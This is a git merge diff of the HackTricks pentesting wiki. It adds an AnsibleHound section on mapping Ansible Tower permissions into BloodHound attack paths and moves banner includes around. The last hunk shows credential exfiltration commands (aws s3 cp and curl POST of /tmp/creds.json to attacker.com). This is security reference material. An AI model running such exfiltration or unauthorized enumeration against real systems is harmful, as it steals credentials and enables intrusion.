Merge branch 'HackTricks-wiki:master' into master

Author: hasshido

searchindex.js

@@ -227,6 +227,7 @@
     - [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md)
     - [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md)
     - [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md)
+    - [Aws Sagemaker Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md)
     - [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md)
     - [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md)
     - [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md)
@@ -267,6 +268,7 @@
     - [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md)
   - [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md)
     - [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md)
+    - [AWS - AppRunner Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc.md)
     - [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md)
     - [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md)
     - [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md)

src/SUMMARY.md

@@ -136,6 +136,75 @@ From a **white box security** review, you would need the **System Auditor role**
 
 </details>
 
+## Enumeration & Attack-Path Mapping with AnsibleHound
+
+`AnsibleHound` is an open-source BloodHound *OpenGraph* collector written in Go that turns a **read-only** Ansible Tower/AWX/Automation Controller API token into a complete permission graph ready to be analysed inside BloodHound (or BloodHound Enterprise).
+
+### Why is this useful?
+1. The Tower/AWX REST API is extremely rich and exposes **every object and RBAC relationship** your instance knows about.
+2. Even with the lowest privilege (**Read**) token it is possible to recursively enumerate all accessible resources (organisations, inventories, hosts, credentials, projects, job templates, users, teams…).
+3. When the raw data is converted to the BloodHound schema you obtain the same *attack-path* visualisation capabilities that are so popular in Active Directory assessments – but now directed at your CI/CD estate.
+
+Security teams (and attackers!) can therefore:
+* Quickly understand **who can become admin of what**.
+* Identify **credentials or hosts that are reachable** from an unprivileged account.
+* Chain multiple “Read ➜ Use ➜ Execute ➜ Admin” edges to obtain full control over the Tower instance or the underlying infrastructure.
+
+### Prerequisites
+* Ansible Tower / AWX / Automation Controller reachable over HTTPS.
+* A user API token scoped to **Read** only (created from *User Details → Tokens → Create Token → scope = Read*).
+* Go ≥ 1.20 to compile the collector (or use the pre-built binaries).
+
+### Building & Running
+```bash
+# Compile the collector
+cd collector
+go build . -o build/ansiblehound
+
+# Execute against the target instance
+./build/ansiblehound -u "https://tower.example.com/" -t "READ_ONLY_TOKEN"
+```
+Internally AnsibleHound performs *paginated* `GET` requests against (at least) the following endpoints and automatically follows the `related` links returned in every JSON object:
+```
+/api/v2/organizations/
+/api/v2/inventories/
+/api/v2/hosts/
+/api/v2/job_templates/
+/api/v2/projects/
+/api/v2/credentials/
+/api/v2/users/
+/api/v2/teams/
+```
+All collected pages are merged into a single JSON file on disk (default: `ansiblehound-output.json`).
+
+### BloodHound Transformation
+The raw Tower data is then **transformed to BloodHound OpenGraph** using custom nodes prefixed with `AT` (Ansible Tower):
+* `ATOrganization`, `ATInventory`, `ATHost`, `ATJobTemplate`, `ATProject`, `ATCredential`, `ATUser`, `ATTeam`
+
+And edges modelling relationships / privileges:
+* `ATContains`, `ATUses`, `ATExecute`, `ATRead`, `ATAdmin`
+
+The result can be imported straight into BloodHound:
+```bash
+neo4j stop   # if BloodHound CE is running locally
+bloodhound-import ansiblehound-output.json
+```
+
+Optionally you can upload **custom icons** so that the new node types are visually distinct:
+```bash
+python3 scripts/import-icons.py "https://bloodhound.example.com" "BH_JWT_TOKEN"
+```
+
+### Defensive & Offensive Considerations
+* A *Read* token is normally considered harmless but still leaks the **full topology and every credential metadata**. Treat it as sensitive!
+* Enforce **least privilege** and rotate / revoke unused tokens.
+* Monitor the API for excessive enumeration (multiple sequential `GET` requests, high pagination activity).
+* From an attacker perspective this is a perfect *initial foothold → privilege escalation* technique inside the CI/CD pipeline.
+
+## References
+* [AnsibleHound – BloodHound Collector for Ansible Tower/AWX](https://github.com/TheSleekBoyCompany/AnsibleHound)
+* [BloodHound OSS](https://github.com/BloodHoundAD/BloodHound)
+
 {{#include ../banners/hacktricks-training.md}}
 
 

src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md

@@ -1,8 +1,10 @@
 # Concourse Architecture
 
+{{#include ../../banners/hacktricks-training.md}}
+
 ## Concourse Architecture
 
-{{#include ../../banners/hacktricks-training.md}}
+
 
 [**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html)
 
@@ -38,4 +40,3 @@ In order to execute tasks concourse must have some workers. These workers **regi
 {{#include ../../banners/hacktricks-training.md}}
 
 
-

src/pentesting-ci-cd/concourse-security/concourse-architecture.md

@@ -1,8 +1,10 @@
 # Concourse Enumeration & Attacks
 
+{{#include ../../banners/hacktricks-training.md}}
+
 ## Concourse Enumeration & Attacks
 
-{{#include ../../banners/hacktricks-training.md}}
+
 
 ### User Roles & Permissions
 
@@ -437,9 +439,8 @@ Accept-Encoding: gzip.
 
 ## References
 
-- https://concourse-ci.org/vars.html
+- [https://concourse-ci.org/vars.html](https://concourse-ci.org/vars.html)
 
 {{#include ../../banners/hacktricks-training.md}}
 
 
-

src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md

@@ -1,5 +1,5 @@
 # Gh Actions - Artifact Poisoning
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 

src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md

@@ -1,5 +1,5 @@
 # GH Actions - Cache Poisoning
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 

src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md

@@ -1,5 +1,5 @@
 # Gh Actions - Context Script Injections
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 

src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md

@@ -1,5 +1,5 @@
 # AWS - Persistence
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 

src/pentesting-cloud/aws-security/aws-persistence/README.md

@@ -1,5 +1,6 @@
+# Aws Sagemaker Persistence
 
-# AWS - SageMaker Lifecycle Configuration Persistence
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Overview of Persistence Techniques
 
@@ -157,3 +158,4 @@ aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json
 
 curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload
 ```
+{{#include ../../../banners/hacktricks-training.md}}